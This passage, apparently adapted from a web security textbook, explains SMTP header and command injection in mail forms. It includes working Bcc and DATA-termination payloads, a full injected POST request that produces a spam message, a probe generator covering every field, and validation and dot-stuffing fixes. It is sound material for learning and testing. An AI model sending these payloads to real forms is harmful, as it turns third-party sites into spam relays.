Injecting into SMTP
Many applications contain a facility for users to submit messages via the application; for example, to report a problem to support personnel or to provide feedback about the web site. This facility is usually implemented by interfacing with a mail (or SMTP) server. Typically, user-supplied input is inserted into the SMTP conversation that the application server conducts with the mail server. If an attacker can submit suitably crafted input that is not filtered or sanitized, they may be able to inject arbitrary SMTP commands into this conversation.
In most cases, the application will enable you to specify the contents of the message and your own email address (which is inserted into the From field of the resulting email). You may also be able to specify the subject of the message and other details. Any relevant field that you control may be vulnerable to SMTP injection.
SMTP injection vulnerabilities are often exploited by spammers who scan the Internet for vulnerable mail forms and use these to generate large volumes of nuisance email.
Email Header Manipulation
Consider the form shown in Figure -1, which allows users to send feedback about the application.
Figure -1: A typical site feedback form
Here, users can specify a From address and the contents of the message. The application passes this input to the PHP mail() function, which constructs the email and performs the necessary SMTP conversation with its configured mail server (on Unix systems, typically by handing the message to the local sendmail binary, which does the same). The mail generated is as follows:
To: admin@wahh-app.com
From: marcus@wahh-mail.com
Subject: Site problem
Confirm Order page doesn’t load
The PHP mail() function takes an additional_headers parameter, and the application uses it to set the From address of the message. The same parameter carries any other headers, such as Cc and Bcc, separated from one another by a CRLF sequence. Hence, an attacker who can place a newline in the From field can append a Bcc header of their own and cause the message to be sent to arbitrary recipients, as illustrated in Figure -2. Later PHP releases reject an additional_headers value that contains multiple consecutive newlines (which would end the header block and let the attacker supply a body), and PHP 7.2 and later also accept the headers as an array; neither change stops a single injected Bcc line, so the From value still has to be validated before it reaches mail().
Figure -2: An email header injection attack
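As an added example (not code from the book or from any real application), the following Python models what the two figures show: a hypothetical feedback handler that concatenates the user's From value into the extra-headers string, exactly as mail($to, $subject, $message, "From: $from") would, and a parse of the result with Python's email package to show that an injected Bcc line becomes a real header and that an injected blank line lets the attacker write the body. The victim mailbox and the function names are constructed for illustration.

```python
import email

TO = "admin@wahh-app.com"  # the form's fixed recipient (from the page)


def build_message(user_from, subject, body):
    """Hypothetical vulnerable app: the user's From value is dropped straight
    into the extra-headers string, just as mail($to, $subject, $message,
    "From: $from") would pass it on. No PHP is involved; this only reproduces
    the text that ends up on the wire."""
    additional_headers = f"From: {user_from}"
    return f"To: {TO}\r\nSubject: {subject}\r\n{additional_headers}\r\n\r\n{body}\r\n"


def recipient_headers(raw):
    """Parse the generated message the way a mail agent would and report every
    recipient header, so an injected Cc/Bcc line shows up as a real header."""
    msg = email.message_from_string(raw)
    return {name: msg[name] for name in ("To", "Cc", "Bcc") if msg[name] is not None}


def body_of(raw):
    """The message body as a mail agent would see it (everything after the
    first blank line)."""
    return email.message_from_string(raw).get_payload()


# Constructed inputs: the benign submission from the page, the same field with
# an injected Bcc header, and one that ends the header block early (blank line)
# and supplies its own body text.
BENIGN_FROM = "marcus@wahh-mail.com"
BCC_INJECTION = "marcus@wahh-mail.com\r\nBcc: victim@wahh-mail.com"
BODY_INJECTION = "marcus@wahh-mail.com\r\n\r\nCheap V1AGR4"

if __name__ == "__main__":
    for label, value in [("benign", BENIGN_FROM), ("bcc", BCC_INJECTION), ("body", BODY_INJECTION)]:
        raw = build_message(value, "Site problem", "Confirm Order page doesn't load")
        print(label, recipient_headers(raw), repr(body_of(raw)))
```

The third case matters as much as the second: once the attacker can end the header block, the original body is simply appended to theirs, so the message content is fully under their control as well as its recipients.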
SMTP Command Injection
In other cases, the application may perform the SMTP conversation itself, or may pass user-supplied input to a different component in order to do this. In this situation, it may be possible to inject arbitrary SMTP commands directly into this conversation, potentially taking full control of the messages being generated by the application.
For example, consider an application that uses requests of the following form to submit site feedback:
POST /feedback.php HTTP/1.1
Host: wahh-app.com
Content-Length: 56

From=daf@wahh-mail.com&Subject=Site+feedback&Message=foo
This causes the web application to perform an SMTP conversation with the following commands:
MAIL FROM: daf@wahh-mail.com
RCPT TO: feedback@wahh-app.com
DATA
From: daf@wahh-mail.com
To: feedback@wahh-app.com
Subject: Site feedback
foo
.
In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:
POST /feedback.php HTTP/1.1
Host: wahh-app.com
Content-Length: 266

From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail.com%0d%0aDATA%0d%0aFrom:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo
If the application is vulnerable, then this will result in the following SMTP conversation, which generates two different email messages, with the second being entirely within your control:
MAIL FROM: daf@wahh-mail.com
RCPT TO: feedback@wahh-app.com
DATA
From: daf@wahh-mail.com
To: feedback@wahh-app.com
Subject: Site feedback
foo
.
MAIL FROM: mail@wahh-viagra.com
RCPT TO: john@wahh-mail.com
DATA
From: mail@wahh-viagra.com
To: john@wahh-mail.com
Subject: Cheap V1AGR4
Blah
.
foo
.
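To show why the conversation above yields two messages, here is an added example in Python (not from the book): a hypothetical vulnerable client that writes the form values straight into its SMTP stream, and a minimal model of the server's command parser, fed with the two POST bodies from the page. Server replies are omitted, and both functions are illustrative rather than a real mail client or MTA; the only addition to the page's listing is the blank line that separates headers from body.

```python
from urllib.parse import parse_qs

RECIPIENT = "feedback@wahh-app.com"

# Constructed inputs: the two POST bodies from the page, the injected one with
# its line wrapping removed.
BENIGN_BODY = "From=daf@wahh-mail.com&Subject=Site+feedback&Message=foo"
INJECTED_BODY = (
    "From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d%0a"
    "MAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail.com%0d%0aDATA%0d%0a"
    "From:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail.com%0d%0a"
    "Subject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo"
)


def client_stream(sender, subject, message):
    """Hypothetical vulnerable application: it writes the SMTP commands and the
    message text into one stream with the form values inserted verbatim. The
    blank line after Subject is the RFC 5322 header/body separator."""
    return (f"MAIL FROM: {sender}\r\nRCPT TO: {RECIPIENT}\r\nDATA\r\n"
            f"From: {sender}\r\nTo: {RECIPIENT}\r\nSubject: {subject}\r\n\r\n"
            f"{message}\r\n.\r\n")


def parse_smtp_stream(stream):
    """Minimal model of the server side: MAIL FROM / RCPT TO fill the envelope,
    DATA collects lines until one that is exactly '.', and whatever follows is
    read as commands again. A client that does not read the server's reply to
    every line never notices that a second transaction took place."""
    messages, envelope, data = [], {"from": None, "to": []}, None
    for line in stream.split("\r\n"):
        if data is not None:                      # inside DATA
            if line == ".":
                messages.append({**envelope, "data": "\r\n".join(data)})
                envelope, data = {"from": None, "to": []}, None
            else:
                data.append(line)
            continue
        verb = line.upper()
        if verb.startswith("MAIL FROM:"):
            envelope["from"] = line.split(":", 1)[1].strip()
        elif verb.startswith("RCPT TO:"):
            envelope["to"].append(line.split(":", 1)[1].strip())
        elif verb == "DATA":
            data = []
        # anything else (such as the leftover 'foo' and '.' after the injected
        # message) would only draw a syntax error from a real server
    return messages


def messages_from_request(post_body):
    """Decode the form exactly as the web application would and return the
    messages the mail server would accept from the resulting stream."""
    form = {k: v[0] for k, v in parse_qs(post_body).items()}
    return parse_smtp_stream(client_stream(form["From"], form["Subject"], form["Message"]))


if __name__ == "__main__":
    for msg in messages_from_request(INJECTED_BODY):
        print(msg["from"], "->", msg["to"])
```

The decisive line is the injected "." on its own: it closes the DATA phase of the legitimate message, after which the server is back in command mode and accepts the attacker's MAIL FROM / RCPT TO / DATA as a fresh transaction.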
Finding SMTP Injection Flaws
To probe an application's mail functionality effectively, target every parameter that is submitted to an email-related function, even those that initially appear unrelated to the content of the generated message (hidden fields, the user's name, a category selector, and so on). Test each parameter for both kinds of attack, header injection and SMTP command injection, and perform each test case with both Windows-style (CRLF) and Unix-style (LF) newline characters, since the application may normalise one but not the other. Inject a recipient address at a mailbox you control: receipt of the probe message is the reliable confirmation that the flaw exists, whereas the HTTP response usually looks the same whether or not the injection succeeded.
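An added example, not from the book, that turns the advice above into a probe generator: for each form parameter it produces URL-encoded POST bodies for both attack kinds and both newline styles, each carrying an injected recipient at a canary mailbox. The form fields are those from the page; the canary address, the probe templates and the function names are assumptions made here.

```python
from urllib.parse import urlencode

# Both line-ending conventions the page says to try; some code paths strip one
# but not the other.
NEWLINES = {"crlf": "\r\n", "lf": "\n"}


def attack_templates(canary, nl):
    """The two kinds of attack on the page, each addressed to a mailbox the
    tester controls so that delivery of the probe confirms the flaw."""
    return {
        # header injection: ends the current header line and adds a recipient
        "header": f"{nl}Bcc: {canary}",
        # SMTP command injection: closes the DATA phase and opens a new envelope
        "command": (f"{nl}.{nl}MAIL FROM: {canary}{nl}RCPT TO: {canary}{nl}"
                    f"DATA{nl}Subject: probe{nl}{nl}probe{nl}.{nl}"),
    }


def injection_probes(params, canary="probe@wahh-mail.com"):
    """Return (parameter, attack kind, newline style, POST body) for every
    combination, leaving all other parameters at their normal values so each
    request isolates one field."""
    probes = []
    for target in params:
        for style, nl in NEWLINES.items():
            for kind, suffix in attack_templates(canary, nl).items():
                form = dict(params)
                form[target] = params[target] + suffix
                probes.append((target, kind, style, urlencode(form)))
    return probes


# Constructed: the feedback form's normal parameters from the page.
FORM = {"From": "daf@wahh-mail.com", "Subject": "Site feedback", "Message": "foo"}

if __name__ == "__main__":
    for target, kind, style, body in injection_probes(FORM):
        print(f"{target:8} {kind:8} {style:5} Content-Length: {len(body)}")
        print(body)
```

Fire each body at the form and watch the canary mailbox; the (parameter, kind, style) tuple of whichever probe arrives tells you exactly which field is vulnerable and what the application failed to filter.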
Preventing SMTP Injection
SMTP injection vulnerabilities can usually be prevented by implementing rigorous validation of any user-supplied data that is passed to an email function or used in an SMTP conversation. Each item should be validated as strictly as possible given the purpose for which it is being used:
■ Email addresses should be checked against a suitable regular expression (which should of course reject any newline characters; test for CR and LF explicitly, because many regex engines allow an end-of-string anchor to match just before a trailing newline).
■ The message subject should not contain any newline characters, and may be subjected to a suitable length limit.
■ If the contents of a message are being used directly in an SMTP conversation, a line containing just a single dot must never reach the server as-is. The standard fix is the transparency rule of RFC 5321 (section 4.5.2): prefix any body line that begins with a dot with a second dot, which the receiving server strips. Rejecting such lines outright also works. Either check must run after line endings have been normalised, because a server may treat a bare LF or CR as a line break.
Where possible, use a mail library that assembles the message and speaks SMTP itself, and pass recipient addresses through its envelope API rather than by concatenating header strings; well-maintained libraries apply dot-stuffing and refuse header values that contain line breaks.
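The three rules above as added example code, not from the book: an address and subject validator, the RFC 5321 dot-stuffing routine for the body, and an assembly function that only accepts validated parts. The regular expression, the length limit and the function names are choices made here, not prescribed by the page.

```python
import re

# Deliberately conservative address grammar (no quoted local parts, no IP
# literals): a printable local part and at least one dotted domain label.
# Adjust to your own policy; the control-character check below is the part
# that matters for injection.
ADDRESS = re.compile(r"[A-Za-z0-9._+-]{1,64}@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")
MAX_SUBJECT = 200  # assumed limit


class SmtpInputError(ValueError):
    """Raised when a form value could alter the SMTP conversation."""


def _no_line_breaks(value, field):
    # Check CR and LF explicitly. Do not rely on a regex anchored with '$':
    # in Python, re.match(r"...$", "x\n") succeeds because '$' also matches
    # immediately before a trailing newline.
    if "\r" in value or "\n" in value:
        raise SmtpInputError(f"{field}: line break not allowed")


def validate_address(value):
    _no_line_breaks(value, "address")
    if not ADDRESS.fullmatch(value):
        raise SmtpInputError(f"address: {value!r} is not a plain mailbox")
    return value


def validate_subject(value):
    _no_line_breaks(value, "subject")
    if len(value) > MAX_SUBJECT:
        raise SmtpInputError("subject: too long")
    return value


def dot_stuff(body):
    """SMTP transparency (RFC 5321, section 4.5.2): normalise every line ending
    to CRLF, then prefix any line that starts with '.' with another '.'; the
    server removes it, so no user-supplied line can be taken as end-of-DATA."""
    lines = re.split(r"\r\n|\r|\n", body)
    return "\r\n".join("." + line if line.startswith(".") else line for line in lines)


def build_data(sender, recipient, subject, body):
    """Assemble the DATA section from validated parts only. The envelope
    addresses (MAIL FROM / RCPT TO) must come from the same validated values."""
    headers = (f"From: {validate_address(sender)}\r\n"
               f"To: {validate_address(recipient)}\r\n"
               f"Subject: {validate_subject(subject)}\r\n\r\n")
    return headers + dot_stuff(body) + "\r\n.\r\n"


def is_valid_submission(sender, subject, body):
    """True if the form values would be accepted by the checks above."""
    try:
        build_data(sender, "feedback@wahh-app.com", subject, body)
        return True
    except SmtpInputError:
        return False


if __name__ == "__main__":
    print(is_valid_submission("daf@wahh-mail.com", "Site feedback", "foo"))
    print(is_valid_submission("daf@wahh-mail.com\r\nBcc: john@wahh-mail.com", "Site feedback", "foo"))
    print(repr(build_data("daf@wahh-mail.com", "feedback@wahh-app.com", "Site feedback", "foo\n.\nMAIL FROM: x@y.com")))
```

Python's own smtplib applies this dot-stuffing before sending, and its email package with the default policy refuses header values containing a line break; the checks here make the same guarantees explicit when the conversation is written by hand, which is the situation the page describes.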